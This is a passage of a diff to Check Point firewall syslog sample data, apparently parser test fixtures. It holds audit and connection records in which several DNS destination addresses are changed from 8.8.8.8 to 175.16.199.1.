 <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; administrator:"admin"; advanced_changes:" "; client_ip:"192.168.1.117"; fieldschanges:"Calculated Security Zone: 'ExternalZone' Security Zone Name: 'ExternalZone' Topology Type: Changed from 'Internal (leads to local network)' to 'External (leads out to the internet)' TopologyCalculationType: Changed from 'Automatic' to 'Manual' "; logic_changes:"SecurityZoneSettings.calculatedSecurityZone: '237a4cbc-7fb6-4d50-872a-4904468271c4' SecurityZoneSettings.securityZoneName: 'ExternalZone' TopologySettings.manualTopology.type: Changed from 'INTERNAL' to 'EXTERNAL' TopologySettings.topologyCalculationType: Changed from 'AUTO' to 'MANUAL' "; objectname:"eth0"; objecttype:"Interface Network"; operation:"Modify Object"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Object Manipulation"; uid:"18c5f54f-0c75-4632-a8e1-a561618c9a0e"]
 <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; administrator:"admin"; advanced_changes:" "; client_ip:"192.168.1.117"; fieldschanges:"Calculated Security Zone: 'InternalZone' Security Zone Name: 'InternalZone' TopologyCalculationType: Changed from 'Automatic' to 'Manual' "; logic_changes:"SecurityZoneSettings.calculatedSecurityZone: 'e8131db2-8388-42a5-924a-82de32db20f7' SecurityZoneSettings.securityZoneName: 'InternalZone' TopologySettings.topologyCalculationType: Changed from 'AUTO' to 'MANUAL' "; objectname:"eth1"; objecttype:"Interface Network"; operation:"Modify Object"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Object Manipulation"; uid:"98745c30-ac3e-4728-b7d7-634f0c115099"]
 <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x2,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; administrator:"admin"; advanced_changes:" "; client_ip:"192.168.1.117"; fieldschanges:"@Interface Index: '1' Hardware: Changed from 'Open server' to 'software' IP Address: '192.168.1.100', '192.168.2.1' Interface Name: 'eth0', 'eth1' Leads out to the Internet: 'Enable' Monitored by ClusterXL: 'Enable' Net Mask: '255.255.255.0' Color: 'Black' "; ip_address:"192.168.1.100"; logic_changes:"ApplianceType: Changed from 'Open server' to 'software' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].color: 'BLACK' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].ipaddr: '192.168.1.100' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].monitoredByCluster: 'Enable' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].netmask: '255.255.255.0' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].officialname: 'eth0' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].security.netaccess.leadsToInternet: 'Enable' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].color: 'BLACK' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].ifindex: '1' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].ipaddr: '192.168.2.1' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].monitoredByCluster: 'Enable' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].netmask: '255.255.255.0' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].officialname: 'eth1' "; objectname:"gw-da58d3"; objecttype:"Gateway"; operation:"Modify Object"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Object Manipulation"; uid:"17c04677-871e-f346-a0dd-3705cb95068f"]
 <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x3,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; administrator:"admin"; client_ip:"192.168.1.117"; fieldschanges:"3 Objects were changed"; operation:"Publish"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Revision Control"]
-<134>1 2020-03-29T17:22:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d961,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502561"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51100"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:22:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d961,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502561"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51100"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:22:47Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"393216"; ifdir:"inbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80d968,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.2.2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43584"; service:"22"; src:"192.168.1.205"; tcp_flags:"PUSH-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T17:22:47Z gw-da58d3 CheckPoint 8363 - [flags:"393280"; ifdir:"inbound"; loguid:"{0x5e80d968,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; blade_name:"Anti Bot & Anti Virus"; information:"policy installation for blade Anti Bot & Anti Virus completed successfully"; product:"Log Update"]
 <134>1 2020-03-29T17:22:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d968,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -2695,7 +2695,7 @@
 <134>1 2020-03-29T17:23:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d98f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59259"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:23:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d98f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62014"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10033"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d990,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52171"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d990,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52171"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59349"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34867"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42640"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10034"; xlatesrc:"0.0.0.0"]
@@ -2758,7 +2758,7 @@
 <134>1 2020-03-29T17:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9be,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9bf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36115"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:24:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9c0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52172"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9c1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9c1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9c1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41603"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9c1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60757"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9c1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53770"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10060"; xlatesrc:"0.0.0.0"]
@@ -2794,20 +2794,20 @@
 <134>1 2020-03-29T17:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9e4,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37572"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10066"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9e4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57574"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9e4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62642"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10067"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
